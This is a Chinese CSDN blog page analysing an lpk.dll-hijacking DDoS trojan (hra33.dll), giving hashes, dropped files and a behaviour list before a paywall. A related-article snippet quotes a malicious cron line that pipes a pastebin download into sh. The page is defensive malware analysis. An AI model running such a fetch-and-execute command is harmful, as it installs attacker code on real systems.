病毒分析之洪水攻击木马分析(hra33.dll(LPK.DLL))

最新推荐文章于 2020-09-26 22:33:20 发布
最新推荐文章于 2020-09-26 22:33:20 发布
阅读量3k 收藏 3
点赞数 1
分类专栏: 软件安全 逆向分析 ASM 文章标签: 病毒分析 洪水攻击 dll劫持 DDOS LPK注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wrsharper/article/details/81064706
版权

病毒分析之洪水攻击木马分析(hra33.dll(LPK.DLL))

样本信息

文件名称:hra33.dll或lpk.dll
文件: C:\Users\Hades-win7\Desktop\hra33.dll.vir
大小: 46080 bytes
修改时间: 2017年8月1日, 12:08:36
MD5: A066B5BB41892068E172E5F52B3137F4
SHA1: 658889F4B0F62B6785C1D8786B6A6B5A2268D00C
CRC32: 43256D4C

生成的文件


其中,
hra33.dll为病毒主体
lpkres.dmp为从病毒主体中dump出来的资源文件(也是PE文件)
gsioo.exe为病毒运行过程中自我复制到系统目录下的文件(文件名随机,文件与lpkres.dmp相同)
gsiqoores.dmp为gsioo.exe的资源文件(也是PE文件,代码与hra33.dll类似操作)

SOFTWARE.LOG为病毒运行过程中自我复制到Temp文件夹下的备份(文件名始终是SOFTWARE.LOG,文件与lpkres.dmp相同)

恶意行为

1.创建服务用于自启动

2.注入系统进程执行恶意代码

3.仿lpk.dll注入正常程序

4.访问恶意网站,可以下载执行恶意程序

最低0.47元/天 解锁文章
HadesW_W
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
lpk.dll劫持
A_ZHAZHAL的博客
07-24 949
文章目录iosguk.exe样本信息PEID 分析火绒剑分析执行监控文件监控服务监控网络监控注册表快照分析IDA 分析WinMain 函数CreateService_0 函数sub_404A63 主函数sub_402B7F 感染共享文件夹sub_40287A 函数sub_404658 网络发包HttpGet 函数sub_4035A3 网络发包hra33.dllIDA 分析DLLEntryPoint...
病毒—Win32/Gamarue
smz007的专栏
04-15 4053
中了一个U盘病毒,费了好大劲才
3601-lpk.dll劫持病毒分析
w_g3366的博客
09-07 1428
文章目录3601-lpk.dll劫持病毒分析1.样本概况1.1 样本信息1.2 测试环境及工具1.3 分析目标1.4 样本行为概述2.具体行为分析2.1 主要行为2.2 提取恶意代码2.3 恶意代码分析3.解决方案3.1 提取病毒的特征,利用杀毒软件查杀3.2 手工查杀步骤 3601-lpk.dll劫持病毒分析 1.样本概况 1.1 样本信息 病毒名称:3601.exe 所属家族:木马病毒 大小:...
工控仪表控件Iocomp ActiveX系列教程:LPK文件授权
yeyeyi1989的专栏
10-29 1562
LPK文件可以解决在Web页面内对某些ActiveX组件进行授权的问题,本文为大家讲解如何为工控仪表控件Iocomp ActiveX创建LPK文件,以及如何将它集成到HTML页面中。 什么是LPK文件 LPK文件是在IE浏览器下运行时授权给ActiveX控件的文件。不管制造商是谁,凡是需要授权的ActiveX组件都必须创建这个LPK文件。 创建LPK文件的步骤 1、首先
论文研究-基于层次灰色关联分析的舱室内环境HRA评价.pdf
09-12
为了在安全性要求较高的舱室设计中进行HRA(Human Reliability Analysis)分析,以人机工程学和认知心理学为基础,分析了影响人机交互效率的主要因素和认知失误原因,建立了人机交互综合认知模型,在此基础上改进了...
招聘配置工作数据化总结分析报告.pptx
12-23
本报告中,招聘流程被详细分解为五个主要步骤:发布信息、筛选简历、HRA初试、部门复试、HRM复试、BOSS终试以及入职。在这一过程中,不同角色如HRA、部门直属主管、部门负责人、HRM和BOSS分别承担着不同的职责,确保...
最完整的招聘分析报告.doc
09-12
【招聘分析报告】 招聘分析报告是企业评估招聘效果和优化招聘流程的重要工具,它涵盖了从招聘团队构建到招聘流程的各个阶段,再到数据分析和成本计算等多个方面。以下是对报告内容的详细解读: 一、招聘小组构成及...
最完整的招聘分析报告(1).doc
09-12
【标题】: 招聘分析报告 【描述】: 这是一份全面的招聘分析报告,涵盖了招聘过程中的各个阶段,包括团队构成、职责分工、招聘流程、基础数据分析、成本效益评估等内容。 【标签】: 资料 【部分内容分析】: 1. **...
2011-06-01HRA-3000网络通信记录分析系统技术白皮书V1.2.pdf
10-14
HR A-3000 网络通信记录分析系统是一款专为智能变电站设计的高级技术解决方案,由珠海市鸿瑞软件技术有限公司开发。该系统旨在提供全面的网络通信监控与分析,确保电力系统的稳定运行和高效管理。 1. 概述 HR A-...
典型病毒分析
01-18
对网络病毒的深入理解对网络病毒的深入理解对网络病毒的深入理解
瑞星杀毒lpk专杀
03-17
瑞星杀毒lpk专杀喜欢的可以去官网下载用起来还不错
手工查杀木马病毒 lpk.dll, usp10.dll
onestab
12-14 1696
1. 重启电脑,按F8,进入带命令行的安全模式 2. 进入C盘根目录,运行以下命令: attrib -S -H -R lpk.dll /s attrib -S -H -R usp10.dll /s del /s lpk.dll del /s usp10.dll 3. 对所有磁盘执行上述命令。 4. 重启电脑:shutdown /r /t 1 备注:系统目录system32下的这
记一次redis病毒分析笔记
weixin_33779515的博客
09-05 201
起因 偶然间发现redis里有一个陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道这肯定不是我们存的,再看value我警觉了,这是要定时执行脚本啊。 分析 于是我便开始逐层拨开它的面纱,脚本的内容是来源于https://pastebin.com/raw/xbY...
腾讯电脑管家有病毒并已致歉?“火绒安全”到底是什么来头?
sdhemaapp的博客
12-28 1万+
提起安全软件,大家首先想到的是腾讯以及360管家。但是,近期一款名为“火绒安全”的软件杀出重围,多次以有病毒为由将腾讯电脑管家拦截在外!不过,作为安全行业大佬的腾讯电脑管家在事情发生后立即在微博回应,并发表致歉声明。火绒安全联合创始人马刚也转发并回复“感谢腾讯的坦诚和勇气,在火绒昨天发出说明后,迅速、彻底地纠正了问题,并积极、善意地和火绒沟通。作为行业领军者,腾讯的态度和行动令人赞叹。我们相信,此次
病毒分析的一些小总结
richard1230的博客
04-10 1142
之前在分析一个office2003的一个恶意代码样本,先总结一下分析病毒行为的一些若干套路:(之前都没有注意) 1.首先打开Word这个进程 2.然后再开启这个进程的进程树: 3.开启监控,并过滤掉相关行为动作: 4.将恶意代码样本拖进至已经打开的这个Word进程: 然后就可以发现它的一系列行为: 然后就发现了它的恶意行为,发现其释放了一个exe,why? 因...
QUI主体、授权文件
Max.blog
08-03 626
QUI主体、授权文件下载:http://pan.baidu.com/s/1boKa7i3
实验七——DLL劫持病毒分析和清除
Onlyone_1314的博客
09-26 7963
【实验名称】 DLL劫持病毒分析和清除 【实验目的】 掌握DLL劫持的原理 了解DLL劫持攻击的防御办法 【实验原理】 Windows2000之后的系统,将强制PE加载器首先在应用程序所在目录中搜索要加载的DLL,如果搜索不到才搜索其他目录。PE加载搜索DLL路径顺序由注册表中的键值决定,注册表路径如下:HKLM\System\CurrentControlSet\Control\Session Manager,中的SafeDllSearchMode键。 SafeDllSearchMode=1
Python如何读取pkl文件
热门推荐
36ICE的博客
12-18 3万+
以mnist.pkl为例  方法一:    方法二:  dataset=’mnist.pkl’  datasets = load_data(dataset)  train_set_x, train_set_y = datasets[0]  valid_set_x, valid_set_y = datasets[1]  test_set_x, test_set_y =
如何根据所测材料HRC硬度值估算对应的HRA、HRB及HB硬度值?
最新发布
06-02
根据经验公式,可以通过HRC硬度值估算出对应的HRA、HRB及HB硬度值。 1. 估算HRA硬度值: HRA = 100 - (HRC - 30) / 3 2. 估算HRB硬度值: HRB = (HRC + 1.5) × 100 / 2.5 3. 估算HB硬度值: HB = (HRC × 10) / ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值